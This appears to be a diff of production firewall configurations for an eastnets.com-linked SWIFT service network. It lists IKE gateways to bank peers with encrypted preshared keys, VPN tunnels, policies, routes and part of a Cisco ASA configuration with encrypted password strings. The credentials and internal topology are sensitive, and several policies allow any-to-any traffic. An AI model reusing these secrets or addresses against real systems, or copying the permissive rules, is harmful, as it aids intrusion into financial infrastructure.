+set ike gateway "GW_ENSB_SUPPORT_DIALIN" xauth
+set ike gateway "GW_ENSB_SUPPORT_DIALIN" xauth server auth-method chap pap
+unset ike gateway "GW_ENSB_SUPPORT_DIALIN" xauth do-edipi-auth
+set ike gateway "GW_JSBLPKKA_ISDN" address 0.0.0.0 id "JSBLPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "8ivbGZfRNeSwpSs8/SCHSP8g6vnBdknvtiQ+SAGeaGsbOXp+f/i5AuM=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_JSBLPKKA_ISDN" nat-traversal udp-checksum
+set ike gateway "GW_JSBLPKKA_ISDN" nat-traversal keepalive-frequency 0
+set ike gateway "GW_JSBLPKKA_LL" address 203.130.1.17 Main outgoing-interface "ethernet0/2" preshare "u5Kd/KmXNvq8IWsHo3C6O9++/cnHXssz5cchVdcCfYCiYqNHZtKuljc=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_SONEPKKA_LL" address 124.29.206.142 Main outgoing-interface "ethernet0/2" preshare "FagThSkwNxy/GYsOrBCIbDmiHCn8gv/ByKSWOWUMb9RxlyG6O9UESSk=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_SONEPKKA_ISDN" address 0.0.0.0 id "SONEPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "cG9mVURhNGf1Ohsc09CkR1wOgrnecAZU6SLoFieAIRDnV0X/+LHubx4=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_SONEPKKA_ISDN" nat-traversal
+set ike gateway "GW_UNILPKKA_LL" address 58.27.201.5 Main outgoing-interface "ethernet0/2" preshare "fQdh31dKNPTdIlszA/CAkofzYknO/ilZ0LC9DuTdLekWEVh+vLO1f1w=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_UNILPKKA_ISDN" address 0.0.0.0 id "UNILPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "KBlcVkWwNiJ6XAsIp6CPxGotIInlzky3qTwOeBp6HYi+D4p71eIiK0w=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_UNILPKKA_ISDN" nat-traversal
+set ike gateway "GW_EGIBPKKA_DR_LL" address 58.27.253.251 Main outgoing-interface "ethernet0/2" preshare "svPPJvR/N+n+1WsAuYCd6t9Js1nIzSwLDiQ5Uyp+WCadXskwdtYdL20=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_ENSBDXB" address 80.227.254.205 Main outgoing-interface "ethernet0/2" preshare "V/1Z77I7N5UuF0siYAC8t0qvN3nIG3TpOM2aUMK1gnY0ZXCKcHdu9vc=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_NIBPPKKA_LL2" address 115.186.127.22 Main outgoing-interface "ethernet0/2" preshare "gr4PioOaNuzxlosR0ACEOp6XJ6nXOi1yVdwEVYYZtcgQx+3Ew1Al/cM=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_NIBPPKKA_DRCP_LL" address 203.101.168.5 Main outgoing-interface "ethernet0/2" preshare "FiV4MpdnNlwjfYsrN/C2qQ22jnn9Sk6r5Bsgp+tx49/5mIwKwgfwJgI=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_MEZNPKKA_DR_LL" address 125.209.127.246 Main outgoing-interface "ethernet0/2" preshare "svPPJvR/N+n+1WsAuYCd6t9Js1nIzSwLDiQ5Uyp+WCadXskwdtYdL20=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_ENSBNOC_LL" address 80.227.254.242 Main outgoing-interface "ethernet0/2" preshare "W5sKIKyNN6WFQXsRtUCAa/gR5onQZJsgP5BbGHEmUmxXXGjgr/mcdN4=" proposal "pre-g2-3des-sha"
+set ike gateway "GW_AIINPKKA_DRCP_LL" address 124.29.206.2 Main outgoing-interface "ethernet0/2" preshare "Ngzaj90JNQQZLws9CYCR7E+gPsnFWqinCgXYgZ0NJ3kXox6fDxCxtpc=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_AIINPKKA1_LL" address 124.29.205.226 Main outgoing-interface "ethernet0/2" preshare "clR444+FNgOXE9soBsCTdswH4Fnc1I23+zCsqO/WLkMf7GsrC+XIzbA=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_SAUDPKKA_GWCP_LL" address 58.27.246.186 Main outgoing-interface "ethernet0/2" preshare "zLOt/8MaNxrzdHs1TaCd0dttt1n1WFVYacdi80vZRsH1r5sxQIBOCgI=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_SAUDPKKA_DRCP_LL" address 58.27.246.194 Main outgoing-interface "ethernet0/2" preshare "B+bGtF+BNNCpO/sckcCDos7M0DnSJl3Hxbp+uaNxpWIyXpr20UsHea4=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_SAUDPKKA_ISDN" address 0.0.0.0 id "SAUDPKKA@eastnets.com" Main outgoing-interface "ethernet0/1" preshare "jDQ62kYdNVmwNKs55iCVKrKQ6zn7Puq4Q3+SZUxR4HlJeb3iv+hRj/4=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_SAUDPKKA_ISDN" nat-traversal
+set ike gateway "GW_BKIPPKKA_DRCP_LL" address 125.209.120.202 Main outgoing-interface "ethernet0/2" preshare "2tj5qxsjNTnNjWsgDPCclQShSZn7ZPswveGb5fM1O+tdbLjY5IYEq9U=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_UNILPKKA_DRCP_LL" address 103.247.124.141 Main outgoing-interface "ethernet0/2" preshare "+xY6MrF+NRlufwsPozCIXB5ZYuncUo+zfFb1jYnceB9sV9QIrTdzLXo=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_BURJPKKA_ISDN" address 0.0.0.0 id "BURJPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "xSdcf0MKNXtm6xsng/CrjbZAZnnS7XsZ2oS3dA+fRoPEHWTvRFFfXdQ=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_BURJPKKA_ISDN" nat-traversal
+set ike gateway "GW_BURJPKKA1_DRCP_LL" address 202.147.191.34 Main outgoing-interface "ethernet0/2" preshare "z/fmbgcHNLMQxgsUfFCjhmp0kVnY7kgfTQKPnT/qxoLpku0AilacrRo=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_DUIBPKKA_DRCP_LL" address 202.163.69.3 Main outgoing-interface "ethernet0/2" preshare "chsUuzG3N6tQVSsVtnCLE+sDxOnSqfvlXeCK3z8oBpmJB3iEsU1LgVk=" proposal "pre-g2-3des-md5"
+set ike gateway "GW_DUIBPKKA_DRCP_ISDN" address 0.0.0.0 id "DUIBPKKA@eastnets.com" Aggr outgoing-interface "ethernet0/1" preshare "bbNhzCAsNeCqV2swztCoEkrUDfnRKVpV9n4lStUQF16Yxnn8dWnrjA4=" proposal "pre-g2-3des-md5"
+unset ike gateway "GW_DUIBPKKA_DRCP_ISDN" nat-traversal
+set ike respond-bad-spi 1
+unset ike ikeid-enumeration
+unset ike dos-protection
+unset ipsec access-session enable
+set ipsec access-session maximum 5000
+set ipsec access-session upper-threshold 0
+set ipsec access-session lower-threshold 0
+set ipsec access-session dead-p2-sa-timeout 0
+unset ipsec access-session log-error
+unset ipsec access-session info-exch-connected
+unset ipsec access-session use-error-log
+set xauth default ippool "Default_Pool"
+set vpn "VPN_DXB" gateway "GW_DXB" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_DXB" monitor optimized rekey
+set vpn "VPN_DXB" id 26 bind interface tunnel.3
+set vpn "VPN_ENSBDXB_ISDN" gateway "GW_DXB_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_ENSBDXB_ISDN" monitor optimized
+set vpn "VPN_ENSBDXB_ISDN" id 25 bind interface tunnel.4
+set vpn "VPN_PTSAAEAA" gateway "GW_N_DXB_OFC" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_PTSAAEAA" monitor optimized rekey
+set vpn "VPN_PTSAAEAA" id 4 bind interface tunnel.1
+set vpn "VPN_PTSAAEAA_ISDN" gateway "GW_N_DXB_OFC_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_PTSAAEAA_ISDN" monitor optimized rekey
+set vpn "VPN_PTSAAEAA_ISDN" id 20 bind interface tunnel.2
+set vpn "VPN_KHYPPKKA_LL" gateway "GW_KHYPPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_KHYPPKKA_LL" monitor optimized rekey
+set vpn "VPN_KHYPPKKA_LL" id 31 bind interface tunnel.1
+set vpn "VPN_KHYBPKKA_ISDN" gateway "GW_KHYBPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_KHYBPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_KHYBPKKA_ISDN" id 32 bind interface tunnel.2
+set vpn "VPN_BKIPPKKA_LL" gateway "GW_BKIPPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_BKIPPKKA_LL" monitor optimized rekey
+set vpn "VPN_BKIPPKKA_LL" id 33 bind interface tunnel.1
+set vpn "VPN_BKIPPKKA_ISDN" gateway "GW_BKIPPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_BKIPPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_BKIPPKKA_ISDN" id 34 bind interface tunnel.2
+set vpn "VPN_AIINPKKA_LL" gateway "GW_AIINPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_AIINPKKA_LL" monitor optimized rekey
+set vpn "VPN_AIINPKKA_LL" id 64 bind interface tunnel.1
+set vpn "VPN_AIINPKKA_ISDN" gateway "GW_AIINPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_AIINPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_AIINPKKA_ISDN" id 36 bind interface tunnel.2
+set vpn "VPN_PLCOPKKA_LL" gateway "GW_PLCOPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_PLCOPKKA_LL" monitor optimized rekey
+set vpn "VPN_PLCOPKKA_LL" id 86 bind interface tunnel.1
+set vpn "VPN_PLCOPKKA_ISDN" gateway "GW_PLCOPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_PLCOPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_PLCOPKKA_ISDN" id 39 bind interface tunnel.2
+set vpn "VPN_DBHDPKKA_LL" gateway "GW_DBHDPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_DBHDPKKA_LL" monitor optimized rekey
+set vpn "VPN_DBHDPKKA_LL" id 65 bind interface tunnel.1
+set vpn "VPN_SUMBPKKA_ISDN" gateway "GW_DBHDPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_SUMBPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_SUMBPKKA_ISDN" id 41 bind interface tunnel.2
+set vpn "VPN_FAYSPKKA_LL" gateway "GW_FAYSPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_FAYSPKKA_LL" monitor optimized rekey
+set vpn "VPN_FAYSPKKA_LL" id 42 bind interface tunnel.1
+set vpn "VPN_FAYSPKKA_ISDN" gateway "GW_FAYSPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_FAYSPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_FAYSPKKA_ISDN" id 43 bind interface tunnel.2
+set vpn "VPN_FDIBPKKA_LL" gateway "GW_FDIBPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_FDIBPKKA_LL" monitor optimized rekey
+set vpn "VPN_FDIBPKKA_LL" id 44 bind interface tunnel.1
+set vpn "VPN_FDIBPKKA_ISDN" gateway "GW_FDIBPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_FDIBPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_FDIBPKKA_ISDN" id 45 bind interface tunnel.2
+set vpn "VPN_NIBPPKKA_LL" gateway "GW_NIBPPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_NIBPPKKA_LL" monitor optimized rekey
+set vpn "VPN_NIBPPKKA_LL" id 91 bind interface tunnel.1
+set vpn "VPN_NIBPPKKA_ISDN" gateway "GW_NIBPPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_NIBPPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_NIBPPKKA_ISDN" id 47 bind interface tunnel.2
+set vpn "VPN_MEZNPKKA_LL" gateway "GW_MEZNPKKA_LL" no-replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_MEZNPKKA_LL" monitor optimized rekey
+set vpn "VPN_MEZNPKKA_LL" id 48 bind interface tunnel.1
+set vpn "VPN_MEZNPKKA_ISDN" gateway "GW_MEZNPKKA_ISDN" no-replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_MEZNPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_MEZNPKKA_ISDN" id 49 bind interface tunnel.2
+set vpn "VPN_FWOMPKKA_LL" gateway "GW_FWOMPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_FWOMPKKA_LL" monitor optimized rekey
+set vpn "VPN_FWOMPKKA_LL" id 50 bind interface tunnel.1
+set vpn "VPN_FWOMPKKA_ISDN" gateway "GW_FWOMPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_FWOMPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_FWOMPKKA_ISDN" id 88 bind interface tunnel.2
+set vpn "VPN_FAYSPKKA_DR_LL" gateway "GW_FAYSPKKA_DR_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_FAYSPKKA_DR_LL" monitor optimized rekey
+set vpn "VPN_FAYSPKKA_DR_LL" id 59 bind interface tunnel.1
+set vpn "VPN_ENSB_MGMT_DIALIN" gateway "GW_ENSB_MGMT_DIALIN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_ENSB_MGMT_DIALIN" monitor optimized rekey
+set vpn "VPN_BAHLPKKA_GWCP_LL" gateway "GW_BAHLPKKA_GWCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_BAHLPKKA_GWCP_LL" monitor optimized rekey
+set vpn "VPN_BAHLPKKA_GWCP_LL" id 67 bind interface tunnel.1
+set vpn "VPN_BAHLPKKA_DRCP_LL" gateway "GW_BAHLPKKA_DRCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_BAHLPKKA_DRCP_LL" monitor optimized rekey
+set vpn "VPN_BAHLPKKA_DRCP_LL" id 68 bind interface tunnel.1
+set vpn "VPN_AIINPKKA_DRCP_LL" gateway "GW_AIINPKKA_DRCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_AIINPKKA_DRCP_LL" monitor optimized rekey
+set vpn "VPN_AIINPKKA_DRCP_LL" id 69 bind interface tunnel.1
+set vpn "VPN_AIINPKKA1_LL" gateway "GW_AIINPKKA1_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_AIINPKKA1_LL" monitor optimized rekey
+set vpn "VPN_AIINPKKA1_LL" id 84 bind interface tunnel.1
+set vpn "VPN_EN _SUPPORT_DIALIN" gateway "GW_ENSB_SUPPORT_DIALIN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_JSBLPKKA_ISDN" gateway "GW_JSBLPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_JSBLPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_JSBLPKKA_ISDN" id 73 bind interface tunnel.2
+set vpn "VPN_JSBLPKKA_LL" gateway "GW_JSBLPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_JSBLPKKA_LL" monitor optimized rekey
+set vpn "VPN_JSBLPKKA_LL" id 111 bind interface tunnel.1
+set vpn "VPN_SONEPKKA_LL" gateway "GW_SONEPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_SONEPKKA_LL" monitor optimized rekey
+set vpn "VPN_SONEPKKA_LL" id 76 bind interface tunnel.1
+set vpn "VPN_SONEPKKA_ISDN" gateway "GW_SONEPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_SONEPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_SONEPKKA_ISDN" id 81 bind interface tunnel.2
+set vpn "VPN_UNILPKKA_LL" gateway "GW_UNILPKKA_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_UNILPKKA_LL" monitor optimized rekey
+set vpn "VPN_UNILPKKA_LL" id 82 bind interface tunnel.1
+set vpn "VPN_UNILPKKA_ISDN" gateway "GW_UNILPKKA_ISDN" no-replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_UNILPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_UNILPKKA_ISDN" id 83 bind interface tunnel.2
+set vpn "VP_NIBPPKKA_LL2" gateway "GW_NIBPPKKA_LL2" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VP_NIBPPKKA_LL2" monitor optimized rekey
+set vpn "VP_NIBPPKKA_LL2" id 87 bind interface tunnel.2
+set vpn "VPN_NIBPPKKA_DRCP_LL" gateway "GW_NIBPPKKA_DRCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_NIBPPKKA_DRCP_LL" monitor optimized rekey
+set vpn "VPN_NIBPPKKA_DRCP_LL" id 89 bind interface tunnel.1
+set vpn "VPN_ENSBNOC_LL" gateway "GW_ENSBNOC_LL" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "VPN_ENSBNOC_LL" monitor optimized rekey
+set vpn "VPN_ENSBNOC_LL" id 93 bind interface tunnel.5
+set vpn "VPN_SAUDPKKA_GWCP_LL" gateway "GW_SAUDPKKA_GWCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_SAUDPKKA_GWCP_LL" monitor optimized rekey
+set vpn "VPN_SAUDPKKA_GWCP_LL" id 94 bind interface tunnel.1
+set vpn "VPN_SAUDPKKA_DRCP_LL" gateway "GW_SAUDPKKA_DRCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_SAUDPKKA_DRCP_LL" monitor optimized rekey
+set vpn "VPN_SAUDPKKA_DRCP_LL" id 95 bind interface tunnel.1
+set vpn "VPN_SAUDPKKA_ISDN" gateway "GW_SAUDPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_SAUDPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_SAUDPKKA_ISDN" id 96 bind interface tunnel.2
+set vpn "VPN_BKIPPKKA_DRCP_LL" gateway "GW_BKIPPKKA_DRCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_BKIPPKKA_DRCP_LL" monitor optimized rekey
+set vpn "VPN_BKIPPKKA_DRCP_LL" id 98 bind interface tunnel.1
+set vpn "VPN_BURJPKKA_ISDN" gateway "GW_BURJPKKA_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_BURJPKKA_ISDN" monitor optimized rekey
+set vpn "VPN_BURJPKKA_ISDN" id 100 bind interface tunnel.2
+set vpn "VPN_BURJPKKA_DRCP_LL" gateway "GW_BURJPKKA1_DRCP_LL" no-replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_BURJPKKA_DRCP_LL" monitor optimized rekey
+set vpn "VPN_BURJPKKA_DRCP_LL" id 108 bind interface tunnel.1
+set vpn "VPN_DUIBPKKA_DRCP_LL" gateway "GW_DUIBPKKA_DRCP_LL" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_DUIBPKKA_DRCP_LL" monitor optimized rekey
+set vpn "VPN_DUIBPKKA_DRCP_LL" id 112 bind interface tunnel.1
+set vpn "VPN_DUIBPKKA_DRCP_ISDN" gateway "GW_DUIBPKKA_DRCP_ISDN" replay tunnel idletime 0 proposal "g2-esp-3des-md5" 
+set vpn "VPN_DUIBPKKA_DRCP_ISDN" monitor optimized rekey
+set vpn "VPN_DUIBPKKA_DRCP_ISDN" id 113 bind interface tunnel.2
+set nsrp cluster id 1
+set nsrp rto-mirror sync
+set nsrp rto-mirror session ageout-ack
+set nsrp rto-mirror session non-vsi
+set nsrp vsd-group id 0 priority 200
+set nsrp vsd-group id 0 preempt
+set url protocol websense
+exit
+set policy id 13 from "Untrust" to "Trust"  "Dial-Up VPN" "NW_ENSBPK" "ANY" tunnel vpn "VPN_EN _SUPPORT_DIALIN" id 72 pair-policy 12 log 
+set policy id 13
+set log session-init
+exit
+set policy id 12 from "Trust" to "Untrust"  "NW_ENSBPK" "Dial-Up VPN" "ANY" tunnel vpn "VPN_EN _SUPPORT_DIALIN" id 72 pair-policy 13 log 
+set policy id 12
+set log session-init
+exit
+set policy id 11 from "Trust" to "Untrust"  "NW_ENSBPK" "Dial-Up VPN" "ANY" tunnel vpn "VPN_ENSB_MGMT_DIALIN" id 62 pair-policy 10 log 
+set policy id 11
+set log session-init
+exit
+set policy id 10 from "Untrust" to "Trust"  "Dial-Up VPN" "NW_ENSBPK" "ANY" tunnel vpn "VPN_ENSB_MGMT_DIALIN" id 62 pair-policy 11 log 
+set policy id 10
+set log session-init
+exit
+set policy id 9 from "Untrust" to "Trust"  "NW_ENSBPK_CUST_GWCP" "ENSBPK_SAG1" "EN_SAG_Service" permit log 
+set policy id 9
+set dst-address "ENSBPK_SAG2"
+exit
+set policy id 16 from "Untrust" to "Trust"  "NW_ENSBPK_CUST_DRCP" "ENSBPK_SAG1" "EN_SAG_Service" permit log 
+set policy id 16
+set dst-address "ENSBPK_SAG2"
+set log session-init
+exit
+set policy id 15 from "Untrust" to "Trust"  "NW_ENSBPK_CUST_DRCP" "ENSBPK_SWP1" "HTTPS" permit log 
+set policy id 15
+set src-address "NW_ENSBPK_CUST_GWCP"
+set service "ICMP-ANY"
+set service "SWP_TCP48600"
+set log session-init
+exit
+set policy id 7 from "Untrust" to "Untrust"  "Any" "NW_ENSBDXB" "EN_SAG_Service" permit log 
+set policy id 7
+exit
+set policy id 2 from "Trust" to "Untrust"  "Any" "Any" "ANY" permit log 
+set policy id 2
+exit
+set policy id 6 from "Trust" to "Untrust"  "Any" "NW_ENSBDXB" "EN_SAG_Service" permit log 
+set policy id 6 disable
+set policy id 6
+exit
+set policy id 8 from "Trust" to "Untrust"  "Any" "NW_ENSBDXB" "ANY" deny log 
+set policy id 8 disable
+set policy id 8
+exit
+set policy id 5 from "Untrust" to "Trust"  "NWG_DXB_MGMT" "Any" "ANY" permit log 
+set policy id 5
+exit
+set policy id 14 from "Untrust" to "Trust"  "NW_NOC" "NW_ENSBPK" "ANY" permit log 
+set policy id 14
+exit
+set policy id 4 from "Untrust" to "Global"  "Any" "Any" "ANY" permit log 
+set policy id 4
+exit
+set policy id 1 from "Untrust" to "Untrust"  "Any" "Any" "ANY" permit log 
+set policy id 1
+exit
+set policy id 3 from "Untrust" to "Trust"  "Any" "Any" "ANY" permit log 
+set policy id 3 disable
+set policy id 3
+exit
+set nsmgmt bulkcli reboot-timeout 60
+set ssh version v2
+set ssh enable
+set config lock timeout 5
+set ssl port 2443
+set snmp port listen 161
+set snmp port trap 162
+set vrouter "untrust-vr"
+exit
+set vrouter "trust-vr"
+unset add-default-route
+set route 0.0.0.0/0 interface ethernet0/2 gateway 202.63.216.17
+set route 10.82.0.0/16 interface ethernet0/0 gateway 192.168.246.9 preference 20 permanent
+set route 192.168.207.0/24 interface ethernet0/1 gateway 192.168.247.1 preference 20 permanent
+set route 10.95.115.0/24 interface ethernet0/1 gateway 192.168.247.1 preference 20
+set route 172.22.0.0/28 interface tunnel.1 gateway 10.10.0.200 preference 20
+set route 172.22.0.0/28 interface tunnel.2 gateway 10.20.0.200 preference 20 metric 10
+set route 192.168.206.0/24 interface tunnel.3 gateway 10.30.0.10 preference 20
+set route 192.168.206.0/24 interface tunnel.4 gateway 10.30.0.139 preference 20 metric 10
+set route 172.22.0.64/26 interface tunnel.1 gateway 10.10.0.100 preference 20
+set route 172.22.0.64/26 interface tunnel.2 gateway 10.20.0.100 preference 20 metric 10
+set route 172.22.0.128/26 interface tunnel.1 gateway 10.10.0.105 preference 20
+set route 172.22.0.128/26 interface tunnel.2 gateway 10.20.0.105 preference 20 metric 10
+set route 172.22.0.192/26 interface tunnel.1 gateway 10.10.0.110 preference 20
+set route 172.22.0.192/26 interface tunnel.2 gateway 10.20.0.110 preference 20 metric 10
+set route 172.22.1.192/26 interface tunnel.1 gateway 10.10.0.130 preference 20
+set route 172.22.1.192/26 interface tunnel.2 gateway 10.20.0.130 preference 20 metric 10
+set route 172.22.1.128/26 interface tunnel.1 gateway 10.10.0.125 preference 20
+set route 172.22.1.128/26 interface tunnel.2 gateway 10.20.0.125 preference 20 metric 10
+set route 172.22.1.64/26 interface tunnel.1 gateway 10.10.0.120 preference 20
+set route 172.22.1.64/26 interface tunnel.2 gateway 10.20.0.120 preference 20 metric 10
+set route 172.22.1.0/26 interface tunnel.1 gateway 10.10.0.115 preference 20
+set route 172.22.1.0/26 interface tunnel.2 gateway 10.20.0.115 preference 20 metric 10
+set route 172.22.2.64/26 interface tunnel.1 gateway 10.10.0.140 preference 20
+set route 172.22.2.64/26 interface tunnel.2 gateway 10.20.0.140 preference 20 metric 10
+set route 172.22.2.192/26 interface tunnel.1 gateway 10.10.0.150 preference 20
+set route 172.22.2.192/26 interface tunnel.2 gateway 10.20.0.150 preference 20 metric 10
+set route 172.22.2.128/26 interface tunnel.1 gateway 10.10.0.145 preference 20
+set route 172.22.2.128/26 interface tunnel.2 gateway 10.20.0.145 preference 20 metric 10
+set route 172.22.3.64/26 interface tunnel.1 gateway 10.10.0.160 preference 20
+set route 172.22.2.0/26 interface tunnel.1 gateway 10.10.0.135 preference 20
+set route 172.22.3.0/26 interface tunnel.1 gateway 10.10.0.155 preference 20
+set route 172.22.3.128/26 interface tunnel.1 gateway 10.10.0.170 preference 20
+set route 172.22.4.64/26 interface tunnel.1 gateway 10.10.0.175 preference 20
+set route 172.22.5.0/26 interface tunnel.1 gateway 10.10.0.185 preference 20
+set route 172.22.5.0/26 interface tunnel.2 gateway 10.20.0.185 preference 20 metric 10
+set route 172.22.4.64/26 interface tunnel.2 gateway 10.20.0.175 preference 20 metric 10
+set route 172.22.3.128/26 interface tunnel.2 gateway 10.20.0.170 preference 20 metric 10
+set route 172.22.3.192/26 interface tunnel.1 gateway 10.10.0.165
+set route 172.22.3.192/26 interface tunnel.2 gateway 10.20.0.165 metric 10 permanent
+set route 172.22.4.128/26 interface tunnel.1 gateway 10.10.0.180 preference 20
+set route 172.22.4.128/26 interface tunnel.2 gateway 10.20.0.180 preference 20 metric 10
+set route 172.22.5.64/26 interface tunnel.1 gateway 10.10.0.195 preference 20
+set route 172.22.5.128/26 interface tunnel.1 gateway 10.10.0.200 preference 20
+set route 192.168.196.0/24 interface tunnel.5 gateway 10.40.0.20 preference 20
+set route 172.22.6.0/26 interface tunnel.1 gateway 10.10.0.210 preference 20
+set route 172.22.7.0/26 interface tunnel.1 gateway 10.10.0.235 preference 20
+set route 172.22.7.0/26 interface tunnel.2 gateway 10.20.0.235 preference 20 metric 20
+exit
+set vrouter "untrust-vr"
+exit
+set vrouter "trust-vr"
+exit

swift/00566_2_FW1-Configuration.txt

@@ -0,0 +1,551 @@
+ENSBPASA1# show run
+: Saved
+:
+ASA Version 7.0(6)
+!
+hostname ENSBPASA1
+domain-name sag
+enable password PVSASRJovmamnVkD encrypted
+names
+name 192.168.202.25 sag-srv1
+name 192.168.202.20 sag-srv2
+name 192.168.246.7 vpn1-2-nsrp
+name 192.168.246.6 vpn2-int
+name 192.168.246.5 vpn1-int
+name 192.168.246.10 vpn3-mgmt
+name 192.168.246.9 vpn3-int
+name 149.134.0.0 swiftnet-nw
+name 192.168.247.1 isdn-router
+name 192.168.202.22 sag-test
+name 192.168.206.0 ensb-dxb-nw
+name 10.100.200.0 ensb-mgmt-nw
+name 10.100.201.0 ensb-support-nw
+name 192.168.202.10 mgmt-srv1
+name 192.168.219.28 swp-srvr1
+name 192.168.219.30 swp-srvr-cluster
+dns-guard
+!
+interface Ethernet0/0
+ nameif sag
+ security-level 80
+ ip address 192.168.202.1 255.255.255.0 standby 192.168.202.2
+!
+interface Ethernet0/1
+ nameif clients
+ security-level 10
+ ip address 192.168.246.1 255.255.255.0 standby 192.168.246.2
+!
+interface Ethernet0/2
+ nameif swift
+ security-level 60
+ ip address 192.168.244.1 255.255.255.0 standby 192.168.244.2
+!
+interface Ethernet0/3
+ description LAN Failover Interface
+!
+interface Management0/0
+ nameif dmz
+ security-level 20
+ ip address 192.168.219.1 255.255.255.0
+!
+passwd PVSASRJovmamnVkD encrypted
+ftp mode passive
+clock timezone PKT 5
+object-group network sag-servers-prod
+ network-object sag-srv1 255.255.255.255
+ network-object sag-srv2 255.255.255.255
+object-group network ensb-vpns-group
